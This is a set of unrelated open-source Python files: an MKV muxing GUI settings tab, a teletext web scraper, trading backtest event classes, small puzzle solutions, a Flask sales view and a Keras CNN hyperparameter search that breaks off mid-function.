write \"\n \"permissions on Destination folder\")\n invalid_dialog.execute()\n self.destination_path_lineEdit.setText(GlobalSetting.DESTINATION_FOLDER_PATH)\n return False\n except Exception as e:\n write_to_log_file(e)\n error_message = \"\"\n if temp_destination_path == \"[Empty Path]\":\n error_message = \"Enter a valid destination path\"\n else:\n error_message = temp_destination_path + \"\\nisn't a valid path!\"\n invalid_dialog = InvalidPathDialog(error_message=error_message)\n invalid_dialog.execute()\n self.destination_path_lineEdit.setText(GlobalSetting.DESTINATION_FOLDER_PATH)\n return False\n if Path(temp_destination_path) in GlobalSetting.VIDEO_SOURCE_PATHS:\n invalid_dialog = InvalidPathDialog(\n error_message=\"Some Source and destination videos are in the same folder\")\n invalid_dialog.execute()\n self.destination_path_lineEdit.setText(GlobalSetting.DESTINATION_FOLDER_PATH)\n return False\n GlobalSetting.DESTINATION_FOLDER_PATH = temp_destination_path\n return True\n\n def setup_tool_tip_hint(self):\n self.only_keep_those_subtitles_multi_choose_comboBox.set_tool_tip_hint()\n self.only_keep_those_audios_multi_choose_comboBox.set_tool_tip_hint()\n self.make_this_subtitle_default_checkBox.set_tool_tip_hint_no_check()\n self.make_this_audio_default_checkBox.set_tool_tip_hint_no_check()\n\n def add_to_queue_button_clicked(self):\n self.job_queue_layout.setup_queue()\n self.enable_muxing_setting()\n if not GlobalSetting.JOB_QUEUE_EMPTY:\n self.disable_editable_widgets()\n self.control_queue_button.set_state_start_multiplexing()\n self.clear_job_queue_button.setDisabled(False)\n change_global_LogFilePath()\n else:\n self.enable_editable_widgets()\n self.setup_enable_options_for_mkv_only_options()\n\n def tab_clicked(self):\n self.job_queue_layout.show_necessary_table_columns()\n self.setup_enable_options_for_mkv_only_options()\n self.setup_tracks_to_be_chosen_mkv_only_options()\n\n def setup_tracks_to_be_chosen_mkv_only_options(self):\n self.only_keep_those_subtitles_multi_choose_comboBox.refresh_tracks()\n self.only_keep_those_audios_multi_choose_comboBox.refresh_tracks()\n\n def setup_enable_options_for_mkv_only_options(self):\n if GlobalSetting.JOB_QUEUE_EMPTY:\n if GlobalSetting.VIDEO_SOURCE_MKV_ONLY:\n self.only_keep_those_audios_checkBox.setEnabled(True)\n self.only_keep_those_subtitles_checkBox.setEnabled(True)\n self.make_this_audio_default_checkBox.setEnabled(True)\n self.make_this_subtitle_default_checkBox.setEnabled(True)\n self.only_keep_those_audios_checkBox.setToolTip(\"\")\n self.only_keep_those_subtitles_checkBox.setToolTip(\"\")\n self.make_this_audio_default_comboBox.setToolTip(\"\")\n self.make_this_subtitle_default_comboBox.setToolTip(\"\")\n self.setup_tool_tip_hint()\n else:\n\n self.only_keep_those_subtitles_checkBox.setCheckState(Qt.Unchecked)\n self.only_keep_those_audios_checkBox.setCheckState(Qt.Unchecked)\n self.make_this_audio_default_checkBox.setCheckState(Qt.Unchecked)\n self.make_this_subtitle_default_checkBox.setCheckState(Qt.Unchecked)\n\n self.only_keep_those_audios_checkBox.setEnabled(False)\n self.only_keep_those_subtitles_checkBox.setEnabled(False)\n self.make_this_audio_default_checkBox.setEnabled(False)\n self.make_this_subtitle_default_checkBox.setEnabled(False)\n self.only_keep_those_audios_checkBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.only_keep_those_subtitles_checkBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n\n self.make_this_audio_default_checkBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n\n self.make_this_subtitle_default_checkBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.make_this_audio_default_comboBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.make_this_subtitle_default_comboBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.only_keep_those_audios_multi_choose_comboBox.setToolTip(\n \"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.only_keep_those_subtitles_multi_choose_comboBox.setToolTip(\n \"[Disabled] Only works when video files \"\n \"are Mkv only\")\n\n def clear_job_queue_button_clicked(self):\n self.job_queue_layout.clear_queue()\n self.control_queue_button.set_state_add_to_queue()\n self.clear_job_queue_button.setDisabled(True)\n self.control_queue_button.setDisabled(False)\n self.enable_editable_widgets()\n self.enable_muxing_setting()\n self.setup_enable_options_for_mkv_only_options()\n self.update_task_bar_clear_signal.emit()\n\n def disable_editable_widgets(self):\n self.only_keep_those_subtitles_checkBox.setEnabled(False)\n self.only_keep_those_subtitles_multi_choose_comboBox.setEnabled(False)\n self.only_keep_those_audios_checkBox.setEnabled(False)\n self.only_keep_those_audios_multi_choose_comboBox.setEnabled(False)\n self.make_this_subtitle_default_checkBox.setEnabled(False)\n self.make_this_subtitle_default_comboBox.setEnabled(False)\n self.make_this_audio_default_checkBox.setEnabled(False)\n self.make_this_audio_default_comboBox.setEnabled(False)\n self.add_crc_checksum_checkBox.setEnabled(False)\n self.remove_old_crc_checksum_checkBox.setEnabled(False)\n\n def enable_editable_widgets(self):\n self.only_keep_those_subtitles_checkBox.setEnabled(True)\n self.only_keep_those_subtitles_multi_choose_comboBox.setEnabled(\n self.only_keep_those_subtitles_checkBox.isChecked())\n self.only_keep_those_audios_checkBox.setEnabled(True)\n self.only_keep_those_audios_multi_choose_comboBox.setEnabled(self.only_keep_those_audios_checkBox.isChecked())\n self.make_this_subtitle_default_checkBox.setEnabled(True)\n self.make_this_subtitle_default_comboBox.setEnabled(self.make_this_subtitle_default_checkBox.isChecked())\n self.make_this_audio_default_checkBox.setEnabled(True)\n self.make_this_audio_default_comboBox.setEnabled(self.make_this_audio_default_checkBox.isChecked())\n self.add_crc_checksum_checkBox.setEnabled(True)\n self.remove_old_crc_checksum_checkBox.setEnabled(True)\n\n def only_keep_those_audios_close_list(self):\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_AUDIOS_TRACKS_LANGUAGES = self.only_keep_those_audios_multi_choose_comboBox.tracks_language\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_AUDIOS_TRACKS_IDS = self.only_keep_those_audios_multi_choose_comboBox.tracks_id\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_AUDIOS_TRACKS_NAMES = self.only_keep_those_audios_multi_choose_comboBox.tracks_name\n\n def only_keep_those_subtitles_close_list(self):\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_SUBTITLES_TRACKS_LANGUAGES = self.only_keep_those_subtitles_multi_choose_comboBox.tracks_language\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_SUBTITLES_TRACKS_IDS = self.only_keep_those_subtitles_multi_choose_comboBox.tracks_id\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_SUBTITLES_TRACKS_NAMES = self.only_keep_those_subtitles_multi_choose_comboBox.tracks_name\n\n def disable_make_this_subtitle_default_comboBox(self, state):\n self.make_this_subtitle_default_comboBox.setDisabled(state)\n if state:\n self.make_this_subtitle_default_comboBox.setCurrentIndex(-1)\n\n def disable_make_this_audio_default_comboBox(self, state):\n self.make_this_audio_default_comboBox.setDisabled(state)\n if state:\n self.make_this_audio_default_comboBox.setCurrentIndex(-1)\n\n def make_this_audio_default_comboBox_text_changed(self):\n GlobalSetting.MUX_SETTING_MAKE_THIS_AUDIO_DEFAULT_TRACK = str(\n self.make_this_audio_default_comboBox.current_text)\n\n def make_this_subtitle_default_comboBox_text_changed(self):\n GlobalSetting.MUX_SETTING_MAKE_THIS_SUBTITLE_DEFAULT_TRACK = str(\n self.make_this_subtitle_default_comboBox.current_text)\n\n def update_task_bar_progress(self, new_progress):\n self.update_task_bar_progress_signal.emit(new_progress)\n\n def enable_muxing_setting(self):\n self.destination_path_lineEdit.setEnabled(True)\n self.destination_path_button.setEnabled(True)\n self.abort_on_errors_checkBox.setEnabled(True)\n self.keep_log_file_checkBox.setEnabled(True)\n\n def disable_muxing_setting(self):\n self.destination_path_lineEdit.setEnabled(False)\n self.destination_path_button.setEnabled(False)\n self.abort_on_errors_checkBox.setEnabled(False)\n self.keep_log_file_checkBox.setEnabled(False)\n\n @staticmethod\n def abort_on_errors_state_changed(state):\n GlobalSetting.MUX_SETTING_ABORT_ON_ERRORS = bool(state)\n\n def add_crc_checksum_state_changed(self, state):\n if state:\n GlobalSetting.MUX_SETTING_ADD_CRC = True\n GlobalSetting.MUX_SETTING_REMOVE_OLD_CRC = True\n self.remove_old_crc_checksum_checkBox.setChecked(True)\n else:\n GlobalSetting.MUX_SETTING_ADD_CRC = False\n\n def remove_old_crc_checksum_state_changed(self, state):\n if state:\n GlobalSetting.MUX_SETTING_REMOVE_OLD_CRC = True\n else:\n GlobalSetting.MUX_SETTING_ADD_CRC = False\n GlobalSetting.MUX_SETTING_REMOVE_OLD_CRC = False\n self.add_crc_checksum_checkBox.setChecked(False)\n\n @staticmethod\n def keep_log_file_state_changed(state):\n GlobalSetting.MUX_SETTING_KEEP_LOG_FILE = bool(state)\n\n def start_multiplexing_button_clicked(self):\n at_least_one_muxing_setting_has_been_selected = check_if_at_least_one_muxing_setting_has_been_selected()\n all_input_videos_are_found = check_if_all_input_videos_are_found()\n if at_least_one_muxing_setting_has_been_selected and all_input_videos_are_found:\n destination_path_valid = self.check_destination_path()\n if destination_path_valid:\n self.setup_log_file()\n self.control_queue_button.set_state_pause_multiplexing()\n self.disable_muxing_setting()\n self.job_queue_layout.start_muxing()\n self.start_muxing_signal.emit()\n self.clear_job_queue_button.setDisabled(True)\n\n def pause_multiplexing_button_clicked(self):\n self.job_queue_layout.pause_muxing()\n self.control_queue_button.setDisabled(True)\n self.control_queue_button.set_state_pausing_multiplexing()\n\n def paused_done(self):\n self.control_queue_button.set_state_resume_multiplexing()\n self.clear_job_queue_button.setDisabled(False)\n self.control_queue_button.setDisabled(False)\n self.update_task_bar_paused_signal.emit()\n\n def cancel_done(self):\n self.disable_editable_widgets()\n self.enable_muxing_setting()\n self.control_queue_button.set_state_start_multiplexing()\n self.clear_job_queue_button.setDisabled(False)\n change_global_LogFilePath()\n\n def finished_all_jobs(self):\n self.enable_editable_widgets()\n self.enable_muxing_setting()\n self.setup_enable_options_for_mkv_only_options()\n self.control_queue_button.set_state_start_multiplexing()\n self.control_queue_button.setDisabled(True)\n self.clear_job_queue_button.setDisabled(False)\n self.update_task_bar_clear_signal.emit()\n GlobalSetting.JOB_QUEUE_EMPTY = True\n check_if_want_to_keep_log_file()\n\n def setup_log_file(self):\n if self.control_queue_button.state == \"START\":\n open(GlobalFiles.MuxingLogFilePath, 'w+').close()\n\n def set_default_directory(self):\n self.destination_path_lineEdit.setText(DefaultOptions.Default_Destination_Directory)\n","repo_name":"yaser01/mkv-muxing-batch-gui","sub_path":"packages/Tabs/MuxSetting/MuxSetting.py","file_name":"MuxSetting.py","file_ext":"py","file_size_in_byte":31956,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"65"} +{"seq_id":"12041122173","text":"from typing import Dict, Generator, Tuple, Union, Optional, Any\n\nimport bs4\n\nfrom ..scraper import Scraper\nfrom ..teletext import Teletext, TeletextPage\n\n\nclass WDR(Scraper):\n\n NAME = \"wdr\"\n\n PAGE_CATEGORIES = {\n 100: \"index\",\n 101: \"news\",\n 180: \"weather\",\n 200: \"sport\",\n 300: \"program\",\n 500: \"service\",\n 550: \"lotto\",\n 555: \"traffic\",\n 570: \"service\",\n 600: \"sport\",\n 681: \"traffic\",\n 700: \"internal\",\n 800: \"extra\",\n }\n\n COLOR_CLASS_MAPPING = {\n \"black\": \"b\",\n \"red\": \"r\",\n \"green\": \"g\",\n \"yellow\": \"y\",\n \"blue\": \"l\",\n \"magenta\": \"m\",\n \"cyan\": \"c\",\n \"white\": \"w\",\n }\n\n def iter_pages(self) -> Generator[Tuple[int, int, bs4.Tag], None, None]:\n soup = self.get_soup(\"https://www1.wdr.de/wdrtext/index.html\")\n\n for sub_index, content in self._iter_sub_pages(soup.find(\"div\", {\"id\": \"wdrtext_inner\"})):\n yield 100, sub_index, content\n\n # get the link with the current session-id or whatever that is\n generic_href = self._get_href(soup)\n assert generic_href, f\"special wdr page link not found\"\n\n for page_index in range(101, 900):\n url = self._replace_page_num(generic_href, page_index)\n soup = self.get_soup(url)\n if soup:\n page_input = soup.find(\"input\", {\"name\": \"_page_num\"})\n if page_input and page_input[\"value\"] != str(page_index):\n continue\n\n for sub_index, content in self._iter_sub_pages(soup.find(\"div\", {\"id\": \"wdrtext_inner\"})):\n yield page_index, sub_index, content\n\n def _iter_sub_pages(self, div: bs4.Tag) -> Generator[Tuple[int, bs4.Tag], None, None]:\n for sub_index in range(1, 100):\n sub_page = div.find(\"div\", {\"id\": f\"seite_{sub_index}\"})\n if not sub_page:\n break\n\n yield sub_index, sub_page\n\n def _get_href(self, soup: bs4.BeautifulSoup) -> Optional[str]:\n for a in soup.find_all(\"a\"):\n href = a.get(\"href\")\n if href and href.startswith(\"/wdrtext/externvtx100~_eam-\") and \"__page__num-\" in href:\n return \"https://www1.wdr.de\" + href\n\n def _replace_page_num(self, href: str, num: int) -> str:\n idx = href.index(\"__page__num-\")\n return href[:idx+12] + str(num) + href[idx+15:]\n\n def to_teletext(self, content: bs4.Tag) -> TeletextPage:\n tt = TeletextPage()\n for row in content.find(\"div\", {\"class\": \"vt_table\"}).find_all(\"div\", {\"class\": \"vt_row\"}):\n if row.find(\"div\", {\"class\": \"vt_row\"}):\n # assume that unclosed row divs are empty\n # (probably bad practice in template rendering)\n continue\n tt.new_line()\n for elem in row.children:\n if elem.name != \"div\":\n continue\n\n for span in elem.find_all(\"span\"):\n if \"invisible\" in (span.get(\"class\") or []):\n span.clear()\n\n block = TeletextPage.Block(\"\")\n\n classes = elem[\"class\"]\n num_cols = None\n for cls in classes:\n if cls in self.COLOR_CLASS_MAPPING:\n block.color = self.COLOR_CLASS_MAPPING[cls]\n elif cls[3:] in self.COLOR_CLASS_MAPPING:\n block.bg_color = self.COLOR_CLASS_MAPPING[cls[3:]]\n elif cls.startswith(\"col\"):\n num_cols = int(cls[3:])\n\n block.text = elem.find(\"span\").text.replace(\"\\n\", \"\")\n a = elem.find(\"a\")\n if a:\n block.text = a.text\n try:\n link = int(a[\"href\"].split(\"?\", 1)[0][-8:-5])\n block.link = link\n except (ValueError, KeyError) as e:\n self.log(f\"unhandled link address '{a['href']}'\")\n\n if num_cols:\n block.text = block.text[:num_cols]\n\n if block.text:\n tt.add_block(block)\n\n return tt\n\n @classmethod\n def legacy_bytes_to_content(cls, content: bytes) -> Any:\n return cls.to_soup(content.decode(\"utf-8\"))\n","repo_name":"defgsus/teletext-archive-unicode","sub_path":"src/sources/wdr.py","file_name":"wdr.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"5866423685","text":"#-*- coding: UTF-8 -*-\n\nclass Event(object):\n \"\"\"\n \"\"\"\n pass\n\n\nclass MarketEvent(Event):\n \"\"\"\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialises the MarketEvent.\n \"\"\"\n self.type = 'MARKET'\n\n\nclass SignalEvent(Event):\n \"\"\"\n \"\"\"\n \n def __init__(self, strategy_id, symbol, datetime, signal_type, strength):\n \"\"\"\n Initialises the SignalEvent.\n\n Parameters:\n strategy_id - The unique ID of the strategy sending the signal.\n symbol - The ticker symbol, e.g. 'GOOG'.\n datetime - The timestamp at which the signal was generated.\n signal_type - 'LONG' or 'SHORT'.\n strength - An adjustment factor \"suggestion\" used to scale \n quantity at the portfolio level. Useful for pairs strategies.\n \"\"\"\n self.strategy_id = strategy_id\n self.type = 'SIGNAL'\n self.symbol = symbol\n self.datetime = datetime\n self.signal_type = signal_type\n self.strength = strength\n\n\nclass OrderEvent(Event):\n \"\"\"\n \"\"\"\n\n def __init__(self, symbol, order_type, quantity, direction):\n \"\"\"\n Initialises the order type, setting whether it is\n a Market order ('MKT') or Limit order ('LMT'), has\n a quantity (integral) and its direction ('BUY' or\n 'SELL').\n\n TODO: Must handle error checking here to obtain \n rational orders (i.e. no negative quantities etc).\n\n Parameters:\n symbol - The instrument to trade.\n order_type - 'MKT' or 'LMT' for Market or Limit.\n quantity - 非负值,股票购买量.\n direction - 交易方向:买进还是卖出(BUY or SELL).\n \"\"\"\n self.type = 'ORDER'\n self.symbol = symbol\n self.order_type = order_type\n self.quantity = quantity\n self.direction = direction\n\n def print_order(self):\n \"\"\"\n Outputs the values within the Order.\n \"\"\"\n print(\n \"Order: Symbol=%s, Type=%s, Quantity=%s, Direction=%s\" % \n (self.symbol, self.order_type, self.quantity, self.direction)\n )\n\n\nclass FillEvent(Event):\n \"\"\"\n \"\"\"\n\n def __init__(self, timeindex, symbol, exchange, quantity, \n direction, fill_cost, commission=None):\n \"\"\"\n Initialises the FillEvent object. Sets the symbol, exchange,\n quantity, direction, cost of fill and an optional \n commission.\n\n If commission is not provided, the Fill object will\n calculate it based on the trade size and Interactive\n Brokers fees.\n\n Parameters:\n timeindex - The bar-resolution when the order was filled.\n symbol - The instrument which was filled.\n exchange - The exchange where the order was filled.\n quantity - The filled quantity.\n direction - The direction of fill ('BUY' or 'SELL')\n fill_cost - The holdings value in dollars.\n commission - An optional commission sent from IB.\n \"\"\"\n self.type = 'FILL'\n self.timeindex = timeindex\n self.symbol = symbol\n self.exchange = exchange\n self.quantity = quantity\n self.direction = direction\n self.fill_cost = fill_cost\n\n # Calculate commission\n if commission is None:\n self.commission = self.calculate_ib_commission()\n else:\n self.commission = commission\n\n def calculate_ib_commission(self):\n \"\"\"\n Calculates the fees of trading based on an Interactive\n Brokers fee structure for API, in USD.\n\n This does not include exchange or ECN fees.\n\n Based on \"US API Directed Orders\":\n https://www.interactivebrokers.com/en/index.php?f=commission&p=stocks2\n \"\"\"\n full_cost = 1.3\n if self.quantity <= 500:\n full_cost = max(1.3, 0.013 * self.quantity)\n else: # Greater than 500\n full_cost = max(1.3, 0.008 * self.quantity)\n return full_cost","repo_name":"koalarobbie/Torino","sub_path":"events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"28400675524","text":"def main():\n text = \"Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can.\"\n text = text.replace(\",\", \"\").replace(\".\", \"\")\n text = text.strip()\n text = text.split()\n word2pos = {}\n for idx, word in enumerate(text):\n if idx in [0, 4, 5, 6, 7, 8, 14, 15, 18]:\n word2pos[word[:1]] = idx + 1\n else:\n word2pos[word[:2]] = idx + 1\n \n print(word2pos)\n\nif __name__ == \"__main__\":\n main()","repo_name":"copasta/NLP100knock2020","sub_path":"chap01/prob04.py","file_name":"prob04.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"22342757787","text":"import fileinput\n\ndef main():\n in_file = fileinput.input()\n\n stacknum = int(in_file.readline())\n\n sets = list()\n for i in range(stacknum):\n c = int(in_file.readline())\n s1 = in_file.readline()\n s2 = in_file.readline()\n result = in_file.readline()\n sets.append([c, s1, s2, result])\n\n for i in range(len(sets)):\n c = sets[i][0]\n s1 = sets[i][1].strip()\n s2 = sets[i][2].strip()\n result = sets[i][3].strip()\n shuffle_num = 0\n s1_ori = s1\n s2_ori = s2\n while(s1 + s2 != result):\n s1, s2 = shuffle(c, s1, s2)\n if s1 == s1_ori and s2 == s2_ori:\n shuffle_num = -1\n break\n shuffle_num += 1\n print(str(i + 1) + \" \" + str(shuffle_num))\n\ndef shuffle(c, s1, s2):\n combined = \"\"\n for i in range(c):\n combined = combined + s2[i] + s1[i]\n\n s1 = combined[:c]\n s2 = combined[c:]\n\n return s1, s2\n\nmain()","repo_name":"AllenBurgett/Python-Augsburg","sub_path":"shuffle_dem_chips/Shuffle.py","file_name":"Shuffle.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"7954945698","text":"import sys\ninput = sys.stdin.readline\n\nnodes = list()\narea = 0\n\nfor _ in range(int(input())):\n nodes.append(tuple(map(float, input().split())))\n \nx1, y1 = nodes.pop(0)\nnodes.append((x1, y1))\n\nfor x2, y2 in nodes:\n area += ((x1 + x2) / 2) * (y2 - y1)\n x1 = x2; y1 = y2\n \n \nprint(area if area >= 0 else -area)\n","repo_name":"pedro1798/BaekJoon","sub_path":"Gold/2166.py","file_name":"2166.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"28966815533","text":"from flask import render_template, request, jsonify\nfrom datetime import datetime\nfrom models import db, Producto, Cajero\n\n# Lista temporal para almacenar los productos en la venta\nproductos_venta = []\n\ndef agregar_producto_venta():\n # Aquí obtienes la información del producto a agregar desde el formulario\n id_producto = request.form['id_producto']\n producto = Producto.query.get(id_producto)\n\n if producto:\n # Agregar el producto a la lista de productos en la venta\n productos_venta.append({'id': producto.id, 'nombre': producto.nombre, 'precio': producto.precio})\n return jsonify({'success': True, 'message': 'Producto agregado a la venta.'})\n else:\n return jsonify({'success': False, 'message': 'Producto no encontrado.'})\n\ndef eliminar_producto_venta(id_producto):\n # Remover el producto de la lista de productos en la venta\n for producto in productos_venta:\n if producto['id'] == id_producto:\n productos_venta.remove(producto)\n return jsonify({'success': True, 'message': 'Producto eliminado de la venta.'})\n \n return jsonify({'success': False, 'message': 'Producto no encontrado en la venta.'})\n\ndef realizar_venta():\n # Calcular el total de la venta sumando los precios de los productos en la lista productos_venta\n total_venta = sum(producto['precio'] for producto in productos_venta)\n\n # Obtener la fecha y hora actual\n fecha_hora = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n # Obtener el nombre del cajero (en este caso, usaremos un valor fijo)\n nombre_cajero = \"Nombre del Cajero\" # Debes implementar la obtención del nombre del cajero\n\n # Actualizar inventario y otros procesos de la base de datos (Debes implementar esta parte)\n\n # Limpiar la lista de productos en la venta después de realizar la venta\n productos_venta.clear()\n\n # Renderizar la plantilla de detalles de venta y pasar los valores como argumentos\n return render_template('venta.html', nombre_cajero=nombre_cajero, productos_venta=productos_venta, total_venta=total_venta, fecha_hora=fecha_hora)\n","repo_name":"AntonioTap/pap","sub_path":"views/viewVenta.py","file_name":"viewVenta.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20402735162","text":"from copy import copy\n\nimport numpy as np\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\nfrom keras.models import Sequential\nfrom keras.optimizers import rmsprop, adam\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import to_categorical\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom utils import load_data, calculate_class_weight\n\nHP_SPACE = {\n 'filters_1': [16, 32, 48],\n 'filters_2': [16, 32, 48],\n 'kernel_1': [5, 7, 9],\n 'kernel_2': [3, 5, 7, 9],\n 'pooling_1': [5, 6, 7],\n 'pooling_2': [1, 2, 3],\n 'beta_1': [1 - (10 ** (-p)) for p in range(1, 3)],\n 'beta_2': [1 - (10 ** (-p)) for p in range(2, 5)],\n 'eps': [10 ** (-p) for p in range(10, 13)],\n 'learning_rate': [10 ** (-p) for p in [2.5, 3, 3.5, 4]],\n 'rho': [1 - (10 ** (-p)) for p in [1, 1.5, 2]],\n 'decay': [10 ** (-p) for p in range(1, 4)],\n 'hidden_units': [64, 128, 192, 256, 320],\n 'activation': ['relu', 'tanh'],\n 'use_img_augmentation': [False, True],\n 'use_adam': [False, True],\n 'use_dropout': [False, True],\n 'use_class_weight': [False, True],\n 'use_lr_reduction': [False, True],\n }\n\nclass HyperparametersHandler():\n def __init__(self, initial_parameters=None):\n self.space = HP_SPACE\n self.current = initial_parameters or {key: np.random.randint(0, len(self.space[key])) for key in self.space.keys()}\n self.best = None\n\n @staticmethod\n def _get_adjacent_list_item(choice_list, current_value):\n return choice_list[max(0, min(len(choice_list) - 1, choice_list.index(current_value) + np.random.randint(-1, 2)))]\n\n def modify_hyperparams(self):\n new_hyperparams = copy(self.current)\n parameters = [key for key in self.space.keys() if key not in ('beta_1', 'beta_2', 'eps', 'rho', 'decay')]\n\n for parameter in parameters:\n new_hyperparams[parameter] = self._get_adjacent_list_item(self.space[parameter], self.current[parameter])\n\n if new_hyperparams['use_adam']:\n for parameter in ['beta_1', 'beta_2', 'eps']:\n new_hyperparams[parameter] = self._get_adjacent_list_item(self.space[parameter], self.current[parameter])\n else:\n for parameter in ['rho', 'decay']:\n new_hyperparams[parameter] = self._get_adjacent_list_item(self.space[parameter], self.current[parameter])\n\n self.current = new_hyperparams\n\n def save_best(self):\n self.best = copy(self.current)\n\n\nclass CrossValidator():\n def __init__(self, n_splits, hyperparams, epochs=4):\n self.n_splits = n_splits\n self.hyperparams = hyperparams\n self.epochs = epochs\n\n def run(self, images, labels, class_weight):\n folds = list(StratifiedKFold(n_splits=self.n_splits, shuffle=True, random_state=2018).split(images, np.argmax(labels, axis=1)))\n val_scores = []\n for train_idx, validation_idx in folds:\n images_tr = images[train_idx]\n labels_tr = labels[train_idx]\n images_val = images[validation_idx]\n labels_val = labels[validation_idx]\n\n classifier_trainer = ClassifierTrainer(self.hyperparams)\n classifier_trainer.build_classifier()\n classifier_trainer.compile_classifier()\n classifier_trainer.fit_classifier(images_tr, labels_tr, images_val, labels_val, self.epochs, class_weight)\n\n val_scores.append(classifier_trainer.classifier.evaluate(images_val, labels_val))\n\n return val_scores\n\n\n\nclass ClassifierTrainer:\n def __init__(self, hyperparams, batch_size=32):\n self.hp = hyperparams\n self.batch_size = batch_size\n self.classifier = None\n\n def build_classifier(self):\n self.classifier = Sequential()\n self.classifier.add(\n Conv2D(filters=self.hp['filters_1'], kernel_size=(self.hp['kernel_1'], self.hp['kernel_1']),\n padding='Same', activation=self.hp['activation'], input_shape=(56, 56, 1)))\n self.classifier.add(\n Conv2D(filters=self.hp['filters_1'], kernel_size=(self.hp['kernel_1'], self.hp['kernel_1']),\n padding='Same', activation='relu'))\n self.classifier.add(MaxPool2D(pool_size=(self.hp['pooling_1'], self.hp['pooling_1']), padding='same'))\n if self.hp['use_dropout']:\n self.classifier.add(Dropout(0.25))\n\n self.classifier.add(\n Conv2D(filters=self.hp['filters_2'], kernel_size=(self.hp['kernel_2'], self.hp['kernel_2']),\n padding='Same', activation=self.hp['activation']))\n self.classifier.add(\n Conv2D(filters=self.hp['filters_2'], kernel_size=(self.hp['kernel_2'], self.hp['kernel_2']),\n padding='Same', activation=self.hp['activation']))\n self.classifier.add(MaxPool2D(pool_size=(self.hp['pooling_2'], self.hp['pooling_2']), padding='same'))\n if self.hp['use_dropout']:\n self.classifier.add(Dropout(0.25))\n\n self.classifier.add(Flatten())\n self.classifier.add(Dense(self.hp['hidden_units'], activation=self.hp['activation']))\n if self.hp['use_dropout']:\n self.classifier.add(Dropout(0.5))\n self.classifier.add(Dense(36, activation=\"softmax\"))\n\n def compile_classifier(self):\n self.classifier.compile(self._optimizer, loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\n\n @property\n def _optimizer(self):\n if self.hp['use_adam']:\n optimizer = adam(lr=self.hp['learning_rate'], beta_1=self.hp['beta_1'], beta_2=self.hp['beta_2'],\n epsilon=self.hp['eps'])\n else:\n optimizer = rmsprop(lr=self.hp['learning_rate'], rho=self.hp['rho'], epsilon=self.hp['eps'],\n decay=self.hp['decay'])\n return optimizer\n\n @property\n def _callbacks(self):\n callbacks = []\n reduce_lr_callback = ReduceLROnPlateau(monitor='val_acc', patience=3, verbose=1, factor=0.5, min_lr=0.00001)\n early_stopping = EarlyStopping(monitor='acc')\n return [reduce_lr_callback] if self.hp['use_lr_reduction'] else None\n\n def fit_classifier(self, images_tr, labels_tr, images_val=None, labels_val=None, epochs=10, class_weight=None):\n cw = class_weight if self.hp['use_class_weight'] else None\n\n if self.hp['use_img_augmentation']:\n self._fit(images_tr, labels_tr, images_val, labels_val, epochs, cw)\n else:\n self._fit_generator(images_tr, labels_tr, images_val, labels_val, epochs, cw)\n\n def _fit(self, images_tr, labels_tr, images_val, labels_val, epochs, class_weight):\n self.classifier.fit(images_tr, labels_tr, batch_size=self.batch_size, epochs=epochs, callbacks=self._callbacks,\n validation_data=(images_val, labels_val), shuffle=True, class_weight=class_weight)\n\n def _fit_generator(self, images_tr, labels_tr, images_val, labels_val, epochs, class_weight):\n data_generator = ImageDataGenerator(rotation_range=10, zoom_range=0.10,\n width_shift_range=0.10, height_shift_range=0.10)\n data_generator.fit(images_tr)\n self.classifier.fit_generator(data_generator.flow(images_tr, labels_tr, batch_size=self.batch_size),\n validation_data=(images_val, labels_val), epochs=epochs, callbacks=self._callbacks,\n class_weight=class_weight)\n\n\n\nclass ClassifierOptimizer():\n def __init__(self, initial_hyperparams=None):\n self.hyperparams_handler = HyperparametersHandler(initial_hyperparams)\n self.best_cv_score = 0\n self.best_hyperparams = None\n\n def run_optimization(self, rounds, images, labels, class_weight):\n for iteration in range(rounds):\n try:\n cv_score = self._get_cv_score(images, labels, class_weight)\n\n with open('saved.txt', 'a') as f:\n log_msg = ' '.join([str(cv_score > self.best_cv_score), str(self.hyperparams_handler.current), 'SCORE:', str(cv_score), '\\n\\n'])\n f.write(log_msg)\n\n if cv_score > self.best_cv_score:\n self._save_best(cv_score)\n\n except Exception as e:\n with open('errors.txt', 'a') as f:\n f.write(str(e) + '\\n' + '#' * 50 + '\\n')\n\n 